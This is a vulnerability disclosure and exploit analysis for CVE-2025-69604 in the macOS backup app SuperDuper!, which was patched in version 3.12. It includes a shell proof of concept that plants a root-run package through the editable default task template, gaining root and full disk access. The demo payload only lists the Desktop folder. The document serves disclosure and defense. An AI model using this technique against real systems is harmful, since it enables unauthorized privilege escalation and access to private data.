### CVE-2025-69604

## Description ##

This vulnerability is similar to the one that is described in [CVE-2025-61229](https://www.cve.org/CVERecord?id=CVE-2025-61229) – an attacker can edit the task template to get SuperDuper backup tasks to install an arbitrary package. The package can then run shell scripts as the root user and with the highest level of privacy access (full disk access).

## References ##
- [SuperDuper Security Update v3.12](https://www.shirtpocket.com/blog/index.php/shadedgrey/comments/superduper_v312_now_available)
- [CVE-2025-69604](https://www.cve.org/CVERecord?id=CVE-2025-69604)

CVSS 3.1 Score: NVD score is pending.

## Mitigation
To avoid this vulnerability, either delete the SuperDuper! application, or apply the 3.12 update. 

## Disclaimer
This exploit analysis and proof of concept is provided for educational purposes only. Use it at your own risk.

## High-level summary

In [my previous analysis of the SuperDuper CVE-2025-61229 vulnerability](https://github.com/graypixel2121/CVE-2025-61228), I found that the SuperDuper Default Settings template was still inherently insecure even after the developer addressed that vulnerability in the SuperDuper 3.11 update. That update addressed only the specific vulnerability that was detailed in CVE-2025-61229, but it did not address the fact that an attacker could modify the default task template. Fatefully, the task template includes functionality to install packages, so an attacker can modify the task template to specify a package that can install software or run shell scripts as the root user and with full disk access.

The developer mitigated this vulnerability by removing the "install package" functionality. Again, the task settings template can still be modified by an attacker, and the developer even indicated that this could not be resolved without annoying the user (i.e. requiring the user to authenticate every time the task is modified). So it seems that the default task template will remain vulnerable to modification for the foreseeable future because the developer could not come up with another way to make it more secure.

My previous conclusion is worth repeating: Root privileges and Full Disk Access are the highest privileges that software can attain on macOS. Any developer that asks for those privileges should be writing software that adheres to modern security design principles and best practices. This vulnerability, as well as those exposed in [CVE-2025-57489](https://github.com/graypixel2121/CVE-2025-57489) and [CVE-2025-61228](https://github.com/graypixel2121/CVE-2025-61228), and even the developer's own admission that these problems have persisted for **22 years**, demonstrate that SuperDuper was not *designed* to be a secure product, and has not seen regular design improvements over 22 years to adhere to modern best practices.


## Analysis: Redux: Modern software should not be making careless security mistakes like this

This vulnerability is attacked in almost the exact same manner as [CVE-2025-61229](https://www.cve.org/CVERecord?id=CVE-2025-61229), so I will largely defer to [my previous analysis of that vulnerability here](https://github.com/graypixel2121/CVE-2025-61228). The following Proof of Concept demonstrates the exploit with version 3.11 of SuperDuper:

```
mkdir -p /tmp/scripts
cd ~; export home=`pwd`; export user=`whoami`
printf '#!/bin/bash\n' > /tmp/scripts/preinstall
printf "ls -l $home/Desktop > /Library/private_data.txt\n" >> /tmp/scripts/preinstall
chmod a+x /tmp/scripts/preinstall
pkgbuild --identifier com.gray.sdexploit --nopayload --scripts /tmp/scripts /tmp/attack.pkg

cd ~/'Library/Application Support/SuperDuper!/Saved Settings/.Default Settings.sdsp'
cp 'Session Settings.sdss' Settings.plist
defaults write "`pwd`"/Settings.plist SDshouldInstallPackage -bool YES
defaults write "`pwd`"/Settings.plist SDinstallerPackage /tmp/attack.pkg
cp Settings.plist 'Session Settings.sdss'
```

After completing those commands, simply run a backup with default settings and the attack.pkg will be installed with root privileges and full disk access. The end result is a file named "private_data" in /Library (i.e. writable only by root) that contains a listing of your Desktop folder (i.e. that can only be accessed by code running with full disk access).
